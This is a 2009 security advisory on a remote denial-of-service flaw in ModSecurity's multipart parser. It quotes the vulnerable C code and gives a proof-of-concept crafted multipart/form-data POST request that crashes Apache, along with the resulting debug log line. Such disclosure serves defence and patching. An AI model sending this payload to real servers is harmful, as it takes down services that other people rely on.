============================================= INTERNET SECURITY AUDITORS ALERT 2009-001 - Original release date: February 25th, 2009 - Last revised: March 19th, 2009 - Discovered by: Juan Galiana Lara - Severity: 7.8/10 (CVSS Base Scored) ============================================= I. VULNERABILITY ------------------------- ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS) II. BACKGROUND ------------------------- ModSecurity is the most widely-deployed web application firewall in the world, with more than 15,000 users. It runs as a Apache web server module and is developed by Breach Security [ http://www.breach.com ], it's avaliable with GNU GPL and many other comercial licenses. III. DESCRIPTION ------------------------- The multipart processor of modsecurity does not sanitize the user supplied input sufficiently. Therefore, an attacker can send a crafted post request of type multipart/form-data which will lead in a remote denial of service. The snippet of vulnerable code: in file msc_multipart.c 1256 int multipart_get_arguments(modsec_rec *msr, char *origin, apr_table_t *arguments) { 1257 multipart_part **parts; 1258 int i; 1259 1260 parts = (multipart_part **)msr->mpd->parts->elts; 1261 for(i = 0; i < msr->mpd->parts->nelts; i++) { 1262 if (parts[i]->type == MULTIPART_FORMDATA) { 1263 msc_arg *arg = (msc_arg *)apr_pcalloc(msr->mp, sizeof(msc_arg)); 1264 if (arg == NULL) return -1; 1265 1266 arg->name = parts[i]->name; 1267 arg->name_len = strlen(parts[i]->name); On line 1267, due to the pointer parts[i]->name is not properly sanitized the parameter of strlen function takes the value NULL, getting a segmentation fault and resulting in a crash of the apache process that handle the request. IV. PROOF OF CONCEPT ------------------------- The process could be crashed remotely by sending: POST / HTTP/1.0 Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxxxx Content-Length: 91 -----------------------------xxxxxxxxxxxxxx : -----------------------------xxxxxxxxxxxxxx-- In order to send a correct HTTP/1.1 request you must add a valid Host header. With the configuration directives: SecAuditEngine On SecDebugLogLevel 9 After the attack, the last line of the debug logfile is: [25/Feb/2009:09:51:18 +0100] [vhost/sid#884348][rid#aaf0d8][/][9] Multipart: Added part abe458 to the list: name "(null)" (offset 0, length 0) V. BUSINESS IMPACT ------------------------- An attacker could cause a remote denial of service to an Apache installation with modsecurity 2 module. VI. SYSTEMS AFFECTED ------------------------- ModSecurity between 2.5.5 and 2.5.8 are vulnerable, other versions may be affected. Tested with Apache httpd 2.2.11.